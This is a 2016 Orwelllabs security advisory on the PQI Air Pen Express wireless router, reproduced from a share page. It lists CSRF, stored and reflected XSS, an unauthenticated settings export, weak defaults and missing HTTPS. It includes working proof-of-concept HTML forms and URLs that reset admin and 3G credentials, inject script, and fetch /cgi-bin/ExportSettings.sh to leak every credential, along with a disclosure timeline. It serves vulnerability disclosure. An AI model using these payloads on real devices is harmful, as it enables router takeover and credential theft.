扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 |
_ _ _ _ | | | | | | ____ _________| | | | __ _| |_____ / _ \| '__\ \ /\ / / _ \ | | |/ _<code> | '_ \/ __| | (_) | | \ VV /__/ | | | (_| | |_) \__ \ \___/|_|\_/\_/ \___|_|_|_|\__,_|_.__/|___/ Security Adivisory 2016-04-03 www.orwelllabs.com Twitter:@orwelllabs magicword: d0ubl3th1nk1ng... Overview ======= Technical Risk: high Likelihood of Exploitation: medium Vendor: PQI Group Affected Products: PQI Air Pen Express - Wireless Router 6W51-0000R2 and 6W51-0000R2XXX Credits: Discovered and researched by Orwelllabs Adivisory URL: http://www.orwelllabs.com/2016/04/pqi-air-pen-express-wireless-router.html Issues ===== I. Multiple Cross-Site Request Forgery (CSRF) (CWE-352) II. Multiple Stored Cross-site Scripting (CWE-79) III. Multiple Reflected Cross-Site Scripting (CWE-79) IV. Insecure Direct Request V. Insecure Default Permissions (CWE-276) VI. No SSL background ========= The smart lipstick-shaped PQI Air Pen express is the world's smallest wireless router/access point combo you can get today. PQI Air Pen express can be powered via an external adapter or a powered USB port on your computer and provide a excellent wireless expreience for everyone. I. Cross-Site Request Forgery (CSRF) (CWE-352) </code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code> If a user visits a page bellow, this will set the administrative credential for PQI Air Pen express to "root:r00t" <html> <!-- CSRF PoC --> <body> <form action="http://{airpenXweb}/goform/setSysAdm" method="POST"> <input type="hidden" name="admuser" value="root" /> <input type="hidden" name="admpass" value="r00t" /> <input type="submit" value="Submit form" /> </form> </body> </html> The attacker can also abuse of the multiple XSS in this device to exploit this vulnerability, something like this to set the same cred 'root:r00t' http:// {airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22 http://airpenXweb/goform/setSysAdm?admuser=root&admpass=r00t%22%3E%3C/script%3E%3C!-- The following poc will set the credential to access point to "3groot:3g00t" (and of course, any other value could be set in this way.) <html> <!-- CSRF PoC2 --> <body> <form action="http://{airpenXweb}/goform/setWan" method="POST"> <input type="hidden" name="connectionType" value="DHCP" /> <input type="hidden" name="staticIp" value="xxx.xxx.xxx.xxx" /> <input type="hidden" name="staticNetmask" value="255.255.255.0" /> <input type="hidden" name="staticGateway" value="xxx.xxx.xxx.xxx" /> <input type="hidden" name="staticPriDns" value="xxx.xxx.xxx.x" /> <input type="hidden" name="staticSecDns" value="xxx.xxx.xxx.x" /> <input type="hidden" name="hostname" value="" /> <input type="hidden" name="pppoeUser" value="pppoe_user" /> <input type="hidden" name="pppoePass" value="pppoe_passwd" /> <input type="hidden" name="pppoePass2" value="pppoe_passwd" /> <input type="hidden" name="pppoeOPMode" value="KeepAlive" /> <input type="hidden" name="pppoeRedialPeriod" value="60" /> <input type="hidden" name="pppoeIdleTime" value="5" /> <input type="hidden" name="l2tpServer" value="l2tp_server" /> <input type="hidden" name="l2tpUser" value="l2tp_user" /> <input type="hidden" name="l2tpPass" value="l2tp_passwd" /> <input type="hidden" name="l2tpMode" value="0" /> <input type="hidden" name="l2tpIp" value="192.168.1.1" /> <input type="hidden" name="l2tpNetmask" value="255.255.255.0" /> <input type="hidden" name="l2tpGateway" value="192.168.1.254" /> <input type="hidden" name="l2tpOPMode" value="KeepAlive" /> <input type="hidden" name="l2tpRedialPeriod" value="60" /> <input type="hidden" name="pptpServer" value="pptp_server" /> <input type="hidden" name="pptpUser" value="pptp_user" /> <input type="hidden" name="pptpPass" value="pptp_passwd" /> <input type="hidden" name="pptpMode" value="0" /> <input type="hidden" name="pptpIp" value="192.168.1.1" /> <input type="hidden" name="pptpNetmask" value="255.255.255.0" /> <input type="hidden" name="pptpGateway" value="192.168.1.254" /> <input type="hidden" name="pptpOPMode" value="KeepAlive" /> <input type="hidden" name="pptpRedialPeriod" value="60" /> <input type="hidden" name="APN3G" value="" /> <input type="hidden" name="PIN3G" value="" /> <input type="hidden" name="Dial3G" value="" /> <input type="hidden" name="User3G" value="3groot" /> < -- 3G User <input type="hidden" name="Password3G" value="3gr00t" /><--3G Password <input type="hidden" name="Dev3G" value="Auto" /> <input type="hidden" name="macCloneEnbl" value="0" /> <input type="hidden" name="macCloneMac" value="" /> <input type="submit" value="Submit form" /> </form> </body> </html> II. Stored Cross-site Scripting (CWE-79) </code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code> "Wide Area Network (WAN) Settings" # PocParameter: "hostname" http://{airpenXweb}/goform/setWan?connectionType=DHCP&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=&staticPriDns=&staticSecDns=xxx.xxx.xxx.xxx&hostname=[ * STOREDXSS *]&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac= "Webs URL Filter Settings" # PocParameter: "addURLFilter" http://{airpenXweb}/goform/websURLFilter?addURLFilter=[ *STOREDXSS* ]&addwebsurlfilter=Add Request in this page will show a pop-up with a content of javascript payload: http://{airpenXweb}/firewall/content_filtering.asp # Parameter: "addHostFilter" http://{airpenXweb}/goform/websHostFilter?addHostFilter=[ *STOREDXSS* ]&addwebscontentfilter=Add III. Reflected Cross-Site Scripting (CWE-79) </code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code> Virtually all application inputs are vulnerable to cross-site scripting, since it is not carried out any validation of the data provided by the user. Bellow are some examples: "Basic Wireless Settings" # PocParameter: "mssid_0" http://{airpenXweb}/goform/wirelessBasic?radiohiddenButton=2&wifihiddenButton=2&wirelessmode=9&bssid_num=1&mssid_0=[* XSS * ]&mssid_1=&mssid_2=&mssid_3=&mssid_4=&mssid_5=&mssid_6=&mssid_8=&mssid_9=&mssid_10=&mssid_11=&mssid_12=&mssid_13=&mssid_14=&mssid_15=&broadcastssid=1&apisolated=0&mbssidapisolated=0&sz11gChannel=1&n_mode=0&n_bandwidth=1&n_gi=1&n_mcs=33&n_rdg=1&n_extcha=1&n_stbc=1&n_amsdu=0&n_autoba=1&n_badecline=0&n_disallow_tkip=1&n_2040_coexit=1&tx_stream=1&rx_stream=1 # PocParameter: "ssid" http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=[ * XSS * ]&security_mode=Disable&wzsecureAlgorithm=AES # PocParameter: "hostname" http://{airpenXweb}/goform/setWan?connectionType=[ -*- XSS -*-]&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=xxx.xxx.xxx.xxx&staticPriDns=xxx.xxx.xxx.xxx5&staticSecDns=203.185.0.36&hostname=tiat&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=%3Cscript%3Ealert%281%29%3C/script%3E&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac= # Parameter: "admpass" http://{airpenXweb}/goform/setSysAdm?admuser=root&admpass=[ -*- XSS -*- ] IV. Insecure Direct Request </code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code> This device allows remote attackers to obtain sensitive information, including all credentials available via direct request to /cgi-bin/ExportSettings.sh. PoC: http://{airpenXweb}/cgi-bin/ExportSettings.sh V. Insecure Default Permissions (CWE-276) </code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code> In the device description (on the Vendor's site) it is very clear that the priority is to facilitate everything for you, including setting. Therefore it is not mandatory that a password is configured for the web interface and not to connect to the AP, this way you can find hundreds of these completely unprotected APs. VI. No SSL </code><code></code><code></code><code></code><code></code><code></code><code></code><code></code><code> Any action, whether sensitive or not is transmitted in plain text because HTTPS is not used and no step. POST /goform/setSysAdm HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://xxx.xxx.xxx.xxx/adm/management.asp Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 35 admuser=ORWL_user&admpass=ORWL_pass Timeline ======= 2015-10-25 - Issues discovered 2015-11-04 - Vendor contacted 2015-12-12 - Another attempt to contact the Vendor... 2016-02-26 - Public Disclosure * There is no easy way to contact the vendor. Emails sent remain unanswered and forms site contacts as well. |
体验盒子
